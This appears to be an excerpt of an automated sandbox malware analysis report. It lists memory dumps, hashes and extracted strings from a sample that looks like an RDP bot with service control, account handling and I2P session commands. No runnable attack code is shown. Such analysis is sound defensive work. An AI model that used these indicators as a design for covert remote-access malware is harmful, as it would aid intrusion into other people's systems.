                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
                                                                                                                  • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                                                                                                  • API String ID: 871770459-375624272
                                                                                                                  • Opcode ID: a35f7812cbe923ef1c13f96ed7a61895abc7dbf494a667d0068b7b9070bf0b42
                                                                                                                  • Instruction ID: 10dbbd6b4e5d5f569b165834080a1927e496cb6420d44e03b7d5153047ee8f65
                                                                                                                  • Opcode Fuzzy Hash: a35f7812cbe923ef1c13f96ed7a61895abc7dbf494a667d0068b7b9070bf0b42
                                                                                                                  • Instruction Fuzzy Hash: 1F513860A08E0381FF14DB27AC213B92251AF44BB8F1403B5D82E0B7F5EEEDE8568744
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                  • Opcode ID: e6fe0ee4781e2237c5bc62fe353100c4409b81cbe2d675ec8ea1fbbadae9fa35
                                                                                                                  • Instruction ID: e48aafdaf76cff61ad48d67b510ecddb485fba76ca2971f25d17ae0b93562917
                                                                                                                  • Opcode Fuzzy Hash: e6fe0ee4781e2237c5bc62fe353100c4409b81cbe2d675ec8ea1fbbadae9fa35
                                                                                                                  • Instruction Fuzzy Hash: 42513A76A09F4286EB50CF56E44436977A6FB84BA8F104179DA8D43778EF3CE848C710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                  • Opcode ID: 3470059c2842616e4c3d826050f24feff18f632955af285b30627b754c70067a
                                                                                                                  • Instruction ID: cd971f2fcb348b4efe5cb1f0a5558dea084573a4813b223f7ac89f46e21c9eed
                                                                                                                  • Opcode Fuzzy Hash: 3470059c2842616e4c3d826050f24feff18f632955af285b30627b754c70067a
                                                                                                                  • Instruction Fuzzy Hash: D6513A76A09F4286EB50CF56E44436977A6FB84BA8F10417ADA8D43778EF3CE848C710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                  • Opcode ID: b48a3cf29118b728d3b0ab39b9842411041187bb3139c8856803f2542875e88e
                                                                                                                  • Instruction ID: 9de65775c47f253ed2c922f8c13783a44ad7f8f8e61df3a1584b5c29da1ec295
                                                                                                                  • Opcode Fuzzy Hash: b48a3cf29118b728d3b0ab39b9842411041187bb3139c8856803f2542875e88e
                                                                                                                  • Instruction Fuzzy Hash: 2B513A76A09F4286EB50CF56E44436977A6FB84BA8F104179DA8D43778EF3CE848C710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                                                                                                                  • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                                                                                                                  • API String ID: 2122475568-588975189
                                                                                                                  • Opcode ID: e43c42e55178450ae885b42b15bceb4faee95b3f056309534d07b306d870700e
                                                                                                                  • Instruction ID: 521ba86d37b1f206902b61260fda7a0156591585f67328cb6cb053d4d3c2b738
                                                                                                                  • Opcode Fuzzy Hash: e43c42e55178450ae885b42b15bceb4faee95b3f056309534d07b306d870700e
                                                                                                                  • Instruction Fuzzy Hash: 76513A76A09F4286EB50CF56E44436977A6FB84BA8F10417ADA8D43778EF3CE848C710
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                                                                                                                  • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                                                                                                                  • API String ID: 546114577-3142219161
                                                                                                                  • Opcode ID: f56fc1782bac19320c22608419659dee0f339a9110204879ad83665987f711c4
                                                                                                                  • Instruction ID: 78df930cd7b49f589299bb5b9f90a70b66bfb1eafa9e21989ec3448cc8f44ad7
                                                                                                                  • Opcode Fuzzy Hash: f56fc1782bac19320c22608419659dee0f339a9110204879ad83665987f711c4
                                                                                                                  • Instruction Fuzzy Hash: 5241E894A0DE07D1FF385F26A481FF812599F1437AF5434B6C50E862F1EE5EA8888301
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                                                                                                                  • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                  • API String ID: 610085118-1825955162
                                                                                                                  • Opcode ID: 0cb550570166a2a4872badf17f3a5e5ab9fa72c4712fd7e321002e22c2959e14
                                                                                                                  • Instruction ID: 07176036c9dcc455b0537da498bcdb3869a5f615402631e40cff004a9d7909d9
                                                                                                                  • Opcode Fuzzy Hash: 0cb550570166a2a4872badf17f3a5e5ab9fa72c4712fd7e321002e22c2959e14
                                                                                                                  • Instruction Fuzzy Hash: 9D510761A09E52C2EB25CF57EC502B96360EF88BA0F1401B5DA4E47BF4EFBCE9558704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                  • API String ID: 1721699506-2819899730
                                                                                                                  • Opcode ID: b77703ae577aa5d73b8ab64137f1823193df00328a205f547bf6fcf4cf55253c
                                                                                                                  • Instruction ID: f54fe53c938c63b174d9ed3da4107a95b1cd16e63b7260b856e2dae6a0853cc5
                                                                                                                  • Opcode Fuzzy Hash: b77703ae577aa5d73b8ab64137f1823193df00328a205f547bf6fcf4cf55253c
                                                                                                                  • Instruction Fuzzy Hash: 73611771A0858785FB20AF94E850BBCA251AB803A8FD55133E90D477E1DEFDE986C321
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CompareCriticalEnterFileSectionTime
                                                                                                                  • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                                                                                                                  • API String ID: 3718746087-844192579
                                                                                                                  • Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                                                                                                  • Instruction ID: aeb4c46beb5ed38b5d06503e6e177f3f85a31b9f00ccddc4390442d0c61eb5ce
                                                                                                                  • Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
                                                                                                                  • Instruction Fuzzy Hash: 2A51D611B0CE83C1FF359E27A590BFA56999F447ACF4420B1DA4D4BBA6EE2CE9058740
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
                                                                                                                  • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                                                                                                                  • API String ID: 2654219296-2700516951
                                                                                                                  • Opcode ID: b4e0eebd0acdf63e55e88a953356f2ca7ce47cd73194c64af9aded8cea86192d
                                                                                                                  • Instruction ID: 90387f703ca77a49d07ec58713c71503d4faae8c5b7e250fc9fa6e7f15df10d9
                                                                                                                  • Opcode Fuzzy Hash: b4e0eebd0acdf63e55e88a953356f2ca7ce47cd73194c64af9aded8cea86192d
                                                                                                                  • Instruction Fuzzy Hash: C341FA21A09E4781FF549F17DCA42B82260AF58B74F1806B5CD2D4A3F4EFBCE8918254
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcpystrlen$strcmp
                                                                                                                  • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                                                                                                                  • API String ID: 245486318-5999096
                                                                                                                  • Opcode ID: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
                                                                                                                  • Instruction ID: c0357ba2b1e404670aa58a7c2abb9b042e2c7cceb46b48cee721f7d4d07771f5
                                                                                                                  • Opcode Fuzzy Hash: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
                                                                                                                  • Instruction Fuzzy Hash: 9E714D65B0DE42C1EA259AA798103792252AF46FB4F5A43F3DD7D0B7F5DF3CA8018241
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                                                                                                                  • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                                                                                                                  • API String ID: 3562457520-1478336053
                                                                                                                  • Opcode ID: 0c25e388b60b41ac24473c6d1973bb8c34b4bad045c6c824f6d0bc82a1aebc99
                                                                                                                  • Instruction ID: 765eaa75b10202a5a1a8b848de43408de77f542bfac25926b8f1b1ea212f6b51
                                                                                                                  • Opcode Fuzzy Hash: 0c25e388b60b41ac24473c6d1973bb8c34b4bad045c6c824f6d0bc82a1aebc99
                                                                                                                  • Instruction Fuzzy Hash: C851E434E0C68782FB60BF55A4A1BBDE6909F46774FD00037C90E476D2EEDEA9858271
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                                                                                                                  • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                                                                                                                  • API String ID: 1135201459-1870638116
                                                                                                                  • Opcode ID: 3739a0e2232f4ce4f9ea34bc067969f42468842cee4b64645b19785e8deb43e7
                                                                                                                  • Instruction ID: 9f86f472d64fe44025826bc815361575c5383f62b520cf0cea077a869a453dfd
                                                                                                                  • Opcode Fuzzy Hash: 3739a0e2232f4ce4f9ea34bc067969f42468842cee4b64645b19785e8deb43e7
                                                                                                                  • Instruction Fuzzy Hash: C4313A51B0EE4685FA55AF93E8403B96352AF86FA0F5840FBDE5E463A5EE2CE504C700
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Process$AllocFreestrcpystrlen
                                                                                                                  • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                                                                                                                  • API String ID: 925994320-1558387473
                                                                                                                  • Opcode ID: ccff84910369868c4f7be9a88cf541ac70a4203e88fafb80ba5cfeec43a8e86f
                                                                                                                  • Instruction ID: 26647edb8c6fcb3df209effa7848eebd40ad88cae9c7bd7fd4ec3dab9b604a38
                                                                                                                  • Opcode Fuzzy Hash: ccff84910369868c4f7be9a88cf541ac70a4203e88fafb80ba5cfeec43a8e86f
                                                                                                                  • Instruction Fuzzy Hash: 36419061A09E4281E751AB97D85437D676AAF44BE4F1404B8EE0E073B6EE3CE845C310
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                  • API String ID: 39653677-3302659514
                                                                                                                  • Opcode ID: 217260ef382b9f57bd3f4d2d5c8626dcf488df49901fa6627209be964d2bae16
                                                                                                                  • Instruction ID: 56bf718c8c30a820b047d7473cb2a94250795bbedc29eb8de45a9643c06df19f
                                                                                                                  • Opcode Fuzzy Hash: 217260ef382b9f57bd3f4d2d5c8626dcf488df49901fa6627209be964d2bae16
                                                                                                                  • Instruction Fuzzy Hash: 01416F71A08A8385FB21EF55A820BBDA752AF447A8FC45133D94E07795DEFDE906C320
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd
